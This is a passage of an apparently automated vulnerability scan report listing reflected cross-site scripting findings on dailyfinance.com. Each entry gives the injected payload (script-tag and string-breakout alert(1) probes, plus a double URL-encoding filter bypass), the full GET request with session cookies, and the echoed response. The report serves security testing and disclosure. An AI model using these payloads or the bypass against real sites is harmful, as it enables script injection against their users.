Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotes/united-states-dollar-b-vs-swiss-franc-spot-usd-chf/usdchf9c349'%3b9fff4749479/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 616da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813bd4458e2 was submitted in the REST URL parameter 3. This input was echoed as 616da"><script>alert(1)</script>813bd4458e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /quotes/united-states-dollar-b-vs-swiss-franc-spot-usd-chf/usdchf616da%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e813bd4458e2/fx1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Quote, News & Summar ...[SNIP]... <input value="USDCHF616DA"><SCRIPT>ALERT(1)</SCRIPT>813BD4458E2" id="navsearch_field" name="sym" class="search" maxlength="25" alt="Enter a symbol here" type="text" /> ...[SNIP]...
1.408. http://www.dailyfinance.com/search/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/search/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b1a9"-alert(1)-"1608cc5b7c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?8b1a9"-alert(1)-"1608cc5b7c9=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.409. http://www.dailyfinance.com/spotlight/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/spotlight/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3784f"-alert(1)-"99cb81ed7c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /spotlight/?3784f"-alert(1)-"99cb81ed7c9=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.410. http://www.dailyfinance.com/stock-charts/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/stock-charts/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c66b8"-alert(1)-"ae6ab4737ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stock-charts/?c66b8"-alert(1)-"ae6ab4737ab=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.411. http://www.dailyfinance.com/stock-quotes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/stock-quotes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f36b5"-alert(1)-"dd3a91f6965 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /stock-quotes/?f36b5"-alert(1)-"dd3a91f6965=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.412. http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7a02"-alert(1)-"2ac6c1f81b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/autos/should-america-be-driving-on-natural-gas/19824562/?a7a02"-alert(1)-"2ac6c1f81b1=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat ...[SNIP]...
1.413. http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfcb4"><script>alert(1)</script>945913d4cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/autos/should-america-be-driving-on-natural-gas/19824562/?dfcb4"><script>alert(1)</script>945913d4cd0=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/autos/should-america-be-driving-on-natural-gas/19824562/?dfcb4"><script>alert(1)</script>945913d4cd0=1" rel="nofollow"> ...[SNIP]...
1.414. http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f564e"><script>alert(1)</script>53fd07ea6ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/?f564e"><script>alert(1)</script>53fd07ea6ec=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/?f564e"><script>alert(1)</script>53fd07ea6ec=1" rel="nofollow"> ...[SNIP]...
1.415. http://www.dailyfinance.com/story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665a8"-alert(1)-"dfaa618585f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/careers/americas-high-unemployment-rate-lack-of-skills-or-jobs/19827650/?665a8"-alert(1)-"dfaa618585f=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.creat ...[SNIP]...
1.416. http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f86a"-alert(1)-"2392dda0435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/company-news/apple-steve-jobs-succession/19828506/?4f86a"-alert(1)-"2392dda0435=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cre ...[SNIP]...
1.417. http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6883"><script>alert(1)</script>e3666f89f36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/company-news/apple-steve-jobs-succession/19828506/?f6883"><script>alert(1)</script>e3666f89f36=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/company-news/apple-steve-jobs-succession/19828506/?f6883"><script>alert(1)</script>e3666f89f36=1" rel="nofollow"> ...[SNIP]...
1.418. http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68dbe"><script>alert(1)</script>f81355318f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/?68dbe"><script>alert(1)</script>f81355318f1=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/?68dbe"><script>alert(1)</script>f81355318f1=1" rel="nofollow"> ...[SNIP]...
1.419. http://www.dailyfinance.com/story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98409"-alert(1)-"2007987fd31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/company-news/january-retail-sales-record-snows-couldnt-stop-sale-shoppers/19827384/?98409"-alert(1)-"2007987fd31=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.cre ...[SNIP]...
1.420. http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f128c"><script>alert(1)</script>a9e75a07df5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/?f128c"><script>alert(1)</script>a9e75a07df5=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/?f128c"><script>alert(1)</script>a9e75a07df5=1" rel="nofollow"> ...[SNIP]...
1.421. http://www.dailyfinance.com/story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20110"-alert(1)-"b71af96c414 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/company-news/will-al-jazeera-capitalize-on-its-newfound-popularity/19824028/?20110"-alert(1)-"b71af96c414=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.422. http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da6e9"><script>alert(1)</script>900503f19b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/?da6e9"><script>alert(1)</script>900503f19b=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/?da6e9"><script>alert(1)</script>900503f19b=1" rel="nofollow"> ...[SNIP]...
1.423. http://www.dailyfinance.com/story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4597"-alert(1)-"f5fb9d7c0db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /story/credit/california-court-gives-hope-to-homeowners-lied-to-by-banks/19824476/?d4597"-alert(1)-"f5fb9d7c0db=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.create ...[SNIP]...
1.424. http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93be4"><script>alert(1)</script>50deeeb9f65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/?93be4"><script>alert(1)</script>50deeeb9f65=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <a name="aol-addthis" href="&body=http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/?93be4"><script>alert(1)</script>50deeeb9f65=1" rel="nofollow"> ...[SNIP]...
1.425. http://www.dailyfinance.com/story/credit/new-jersey-appeals-court-shoots-down-foreclosure-over-bad-docume/19825405/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6223c"-alert(1)-"3957c211126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
